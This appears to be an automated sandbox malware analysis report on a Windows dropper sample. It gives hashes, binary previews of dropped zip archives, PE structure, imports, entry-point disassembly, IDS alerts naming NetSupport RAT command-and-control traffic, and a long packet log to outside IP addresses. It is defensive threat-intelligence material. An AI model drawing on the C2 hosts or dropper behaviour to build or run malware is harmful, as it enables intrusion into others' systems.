                                                      Encrypted:true
                                                      SSDEEP:1536:QZ3ky6aDZbnUYbkKI0fGCplVgt0s+WpT4RhFccEyWI9UuTqFsYBGtpZx93:w3ky6aDZbbbACpl6t0s+WKhScEXI9Uul
                                                      MD5:E6ADABCEEAA1E96EB983291AC41812D3
                                                      SHA1:139A8F2A679FFBCD313EB0C05B5DEB4B6B6622B0
                                                      SHA-256:4812B9D2681BC7F1A47ECE99760066C1BBD40F3CB6E1331D04D448B4227DFE9F
                                                      SHA-512:89A0124583A69613070AF16089B0E20B3683E2FE1EA6ADEF107D0987CBECE278AEF332432A8A2F4F5F409DB35C01CD0246D3A091849AD990D17A057061F066B5
                                                      Malicious:false
                                                      Preview:PK........{..S.V...,...P......WerEnc.dll.|.\SI.....)Q.Q.#.b.o.. .D...D...B..)....".k...ew.......b.=(****.7s...~./.....7....9g.9...........@.Y....(..............U....!.d.-K..$.M...fdd.iq|.P.AK.y.qi..|k..-s..g..C..u.w.,....Lw.}..../.q...h..."./).RGEG~1./_=W..p...x...-3..@.A.<[hi..k.fC..t.. .......3.7.x.......T.O.....oP.]....H..a..*..\..,..i..J3X.@<.......:. .m...o.?....s.\5P%. ....r.uB.8...HHh.)...Uc..$.QS9....7tn.B.0....Q.....?-3^9w...w.wt....?5.a.*....P....9..]......'2.[.....nJ~-p%i...@....T9^.!......#.=v...1.1..|.2.^.-..!.,.vQl.H.x....._.W.s7..e1.....V<........$..2A..C.....x..a... ^...H..8...9......q................9....rO..FH@..T....3.k\._. .%W.b7.i?f:j...O...........{.J,n.R...x..a@:i^....{..>...U.6..U..../1.vR....uN.j._.]^....O..n7\f..!e.O.x.`.2nE..0!.Mk{.2......v}.`:..D....O/]z.}_.......d.N?>f\...KQ..EY...Ah.)k.y...;/7...r..t...(.".5.q.(W...<......T...../..=.{|i...I..;UE....u.s.1..B..%..!z].........G/....a...DF.r{..N..g)._W.4......7...8

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\sdn2[1].zip

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):227999
                                                      Entropy (8bit):7.9973837864428
                                                      Encrypted:true
                                                      SSDEEP:6144:NPbV5TsiY8dBZcVZ3nmeXlxpiryWyxGZBk7KOI:NxYCBiPXmeX/piuLgSKOI
                                                      MD5:E80B9765381CE98E5004EE82FA515E14
                                                      SHA1:008536F83B92FB794B8D325B243A0E00953E43B3
                                                      SHA-256:87D5716606A50D61DC26C26C1A9F84E78D2A0772C9314BE9962F1778E056C405
                                                      SHA-512:B54BD712F42F9FC776CC7B807DAB686A2882FABBE3FD8D183B1F4C85CEF165CD0906C45239B7EE4AC3FA1BCD3B781F82064AA8BE36867620981387EAC4A45206
                                                      Malicious:false
                                                      Preview:PK.........C.RJ..].(...I......msvcp140_codecvt_ids.dll.z.\S...M.. ...H.T.M.....H.A.C.$..........+...V.6$..XQWe.U........7s..u}.....{.{...7.9s..9..L...DH...A.J...".<....A.0:...U>7..a..a\.....'.X.46+-....94.(..K.....R...kuu.S9.;..S7....S....fP..*.6.8..!P.r...RQ../...x..../Ir.OIV.p8...B..2.1.d......~z?..1..J.0Dt.@....(.R.:.A.@...J.K.)oa9....w...J9.c..!.r.. \..#.P.H..4..t(....N...<.7k......8Y.(.............,...5$(.l...|3..'#."..8.a..yX...6".k.\q..F.I.esG...5.........W.#..J... .2...".6..M....[<H..@. ..6u..... ...t....t...Z..n...L...T|X...g|>Z2..~)..*.d.A..1`..^.%3.......:.L...A....H..r@...k..l....T.........l. `k.#...S.....J~.mc."..#.=1/...8.9...c.2...1..aLL</.%.q.1Y..........}LL.0..N....Sfg`q...5l.NO..(Uf...!a.S.=!..5......tj_.p:.W. .N.k.N..........-_o\..I.@z...."..2..%...,X......3.)Xj.|..%~....$.'..A..c..y...........dtY....'...8.../...A\.X.JH..i.........l...i..............6.Cd.!..E.I..4........9...._...q..2.....1.d.....(....\..3...../.*.U#.."%...XU..#.=b..!g.

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):6.461600459380226
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File size:140'800 bytes
                                                      MD5:aace5ed77f7d47cad3e45e0ccdc5411c
                                                      SHA1:cb9c403e8ba1a5531543d6c3b46250065b7f49c0
                                                      SHA256:a179d25f0ca4b9f6b7b1b7b4376664e422a6341650f80ba58626881638b64d50
                                                      SHA512:a73b05d441f2815db2cfdecb00e7df1574d510a28b73e15c365bd94ecb70cebc2ab624783a14874a64da27caa308d58c710ef8c09b96ebf36c04459dd7899874
                                                      SSDEEP:3072:IAthOjYt6ktOt/nYUHal/5+LeLEsSkRqneaNn2qSzAuK2raS:dthOjYt6ktCYUHal/hwhkReeunZceS
                                                      TLSH:81D36C16B9C0D133E8B71931197497B2AE3DFC301B545DCB63980A7A6F306D0AB35A6B
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\]...<h..<h..<h.SDk..<h.SDm..<h.SDl..<h...m.2<h...l..<h...k..<h.SDi..<h..<i.i<h.r.a..<h.r....<h.r.j..<h.Rich.<h................

                                                      File Icon

                                                      Icon Hash:00928e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4073fa
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6561BDA3 [Sat Nov 25 09:25:55 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:35ca174cb7a0dd69ac56ae5f0ce996e5

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007FDE5C6BE204h
                                                      jmp 00007FDE5C6BDCBFh
                                                      jmp 00007FDE5C6C2F67h
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      push dword ptr [ebp+08h]
                                                      mov esi, ecx
                                                      call 00007FDE5C6BDE9Dh
                                                      mov dword ptr [esi], 0041921Ch
                                                      mov eax, esi
                                                      pop esi
                                                      pop ebp
                                                      retn 0004h
                                                      and dword ptr [ecx+04h], 00000000h
                                                      mov eax, ecx
                                                      and dword ptr [ecx+08h], 00000000h
                                                      mov dword ptr [ecx+04h], 00419224h
                                                      mov dword ptr [ecx], 0041921Ch
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      push dword ptr [ebp+08h]
                                                      mov esi, ecx
                                                      call 00007FDE5C6BDE6Ah
                                                      mov dword ptr [esi], 00419238h
                                                      mov eax, esi
                                                      pop esi
                                                      pop ebp
                                                      retn 0004h
                                                      and dword ptr [ecx+04h], 00000000h
                                                      mov eax, ecx
                                                      and dword ptr [ecx+08h], 00000000h
                                                      mov dword ptr [ecx+04h], 00419240h
                                                      mov dword ptr [ecx], 00419238h
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      mov esi, ecx
                                                      lea eax, dword ptr [esi+04h]
                                                      mov dword ptr [esi], 004191FCh
                                                      and dword ptr [eax], 00000000h
                                                      and dword ptr [eax+04h], 00000000h
                                                      push eax
                                                      mov eax, dword ptr [ebp+08h]
                                                      add eax, 04h
                                                      push eax
                                                      call 00007FDE5C6BF051h
                                                      pop ecx
                                                      pop ecx
                                                      mov eax, esi
                                                      pop esi
                                                      pop ebp
                                                      retn 0004h
                                                      lea eax, dword ptr [ecx+04h]
                                                      mov dword ptr [ecx], 004191FCh
                                                      push eax
                                                      call 00007FDE5C6BF09Ch
                                                      pop ecx
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      mov esi, ecx
                                                      lea eax, dword ptr [esi+04h]
                                                      mov dword ptr [esi], 004191FCh
                                                      push eax
                                                      call 00007FDE5C6BF085h

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x20e7c0x8c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x1e0.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x250000x133c.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x204800x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x190000x19c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x1767f0x17800d8130d75dfca9e2759c221e442aad28bFalse0.5903631981382979data6.638540763857237IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x190000x87e60x880078cf3053082e55486bc34273cd165aeaFalse0.4685489430147059data5.058924359157263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x220000x14a40xa0056f89838282ee4d16f98ce00bea3f3c8False0.163671875data2.2329908576039887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x240000x1e00x200e8f29e6669a480a4d72efeb174b889d9False0.52734375data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x250000x133c0x1400c9d098ce7acb412e4277afe993baeb5cFalse0.7755859375data6.476134917020887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      .config0x270000x10000x200c16fdd55aae697949c5110df1dfd0f8bFalse0.859375PGP Secret Sub-key -6.654871125593828IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_MANIFEST0x240600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                      Imports

                                                      DLLImport
                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetOpenUrlW
                                                      SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHCreateDirectoryExW
                                                      SHLWAPI.dllPathCombineW, PathFileExistsW
                                                      KERNEL32.dllHeapSize, SetFilePointerEx, LCMapStringW, lstrlenA, lstrcmpA, HeapAlloc, GetProcessHeap, HeapFree, ExpandEnvironmentStringsW, SetFileAttributesW, Sleep, lstrcatW, lstrlenW, GetSystemDirectoryW, GetCurrentProcess, GetModuleFileNameW, FlushFileBuffers, GetLastError, HeapReAlloc, CloseHandle, ExitProcess, CreateProcessW, CreateDirectoryW, ReadFile, WriteFile, SetFileTime, SetFilePointer, CreateFileW, GetFileAttributesW, MultiByteToWideChar, LocalFileTimeToFileTime, GetCurrentDirectoryW, SystemTimeToFileTime, WideCharToMultiByte, GetConsoleOutputCP, GetConsoleMode, DecodePointer, CreateMutexW, GetSystemTimeAsFileTime, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, WriteConsoleW, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, GetModuleHandleExW, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW
                                                      USER32.dllwsprintfW
                                                      ADVAPI32.dllGetTokenInformation, RegCloseKey, RegSetValueExW, RegOpenKeyW, OpenProcessToken

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-09-21T14:45:24.705430+02002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.74970437.1.209.225443TCP
                                                      2024-09-21T14:45:24.705430+02002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.76301637.1.209.225443TCP
                                                      2024-09-21T14:45:24.705430+02002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.76302037.1.209.225443TCP
                                                      2024-09-21T14:45:24.705430+02002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.76301937.1.209.225443TCP
                                                      2024-09-21T14:45:24.705430+02002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.76301837.1.209.225443TCP
                                                      2024-09-21T14:45:24.705430+02002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.76302137.1.209.225443TCP
                                                      2024-09-21T14:45:24.705430+02002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.76301737.1.209.225443TCP
                                                      2024-09-21T14:45:31.650706+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749700142.11.212.184443TCP
                                                      2024-09-21T14:45:36.119849+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749701142.11.212.184443TCP
                                                      2024-09-21T14:45:37.285896+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749702142.11.212.184443TCP
                                                      2024-09-21T14:45:38.537220+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749703142.11.212.184443TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 21, 2024 14:45:30.197452068 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:30.197506905 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:30.197586060 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:30.207328081 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:30.207351923 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:30.976880074 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:30.978506088 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.512994051 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.513015985 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.513510942 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.513591051 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.517549038 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.563411951 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.650744915 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.650777102 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.650799990 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.650818110 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.650830984 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.650867939 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.685714960 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.685794115 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.741274118 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.741349936 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.742357969 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.742422104 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.743299007 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.743354082 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.776262999 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.776390076 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.776551962 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.776627064 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.831589937 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.831657887 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.832175016 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.832225084 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.833430052 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.833484888 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.834036112 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.834089041 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.866852045 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.866934061 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.867249012 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.867300034 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.867820978 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.867882013 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.922141075 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.922213078 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.922620058 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.922677040 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.923129082 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.923181057 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.923719883 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.923774004 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.924180031 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.924237967 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.924770117 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.924819946 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.925263882 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.925318956 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.925851107 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.925911903 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.926215887 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.926269054 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.958364964 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.958405018 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.958455086 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.958472013 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.958534956 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.958713055 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.958767891 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.959045887 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.959100008 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:31.959399939 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:31.959456921 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.012706041 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.012764931 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.013106108 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.013262033 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.013441086 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.013489008 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.013686895 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.013741016 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.014620066 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.014672041 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.014673948 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.014684916 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.014709949 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.014863014 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.014924049 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.015213966 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.015263081 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.017741919 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.017795086 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.017894983 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.017945051 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.048338890 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.048412085 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.048614979 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.048667908 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.048957109 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.049025059 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.049437046 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.049499035 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.049663067 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.049736023 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.050136089 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.050195932 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104023933 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104063988 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104096889 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104113102 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104156017 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104262114 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104296923 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104310036 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104315042 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104338884 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104356050 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104871988 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104950905 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.105458975 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.105515003 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.105519056 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.105526924 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.105557919 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.105561972 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.105588913 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.105593920 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.105622053 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.105645895 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.106424093 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.106468916 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.106471062 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.106479883 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.106506109 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.106522083 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.140794039 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.140904903 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.140965939 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.141014099 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.141341925 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.141388893 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.141913891 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.141961098 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.141968966 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.141999960 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.142014027 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.142024040 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.142070055 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.142070055 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.194297075 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.194356918 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.194392920 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.194437981 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.194863081 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.194924116 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.195234060 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.195286989 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.195564032 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.195612907 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.195672035 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.195715904 CEST49700443192.168.2.7142.11.212.184
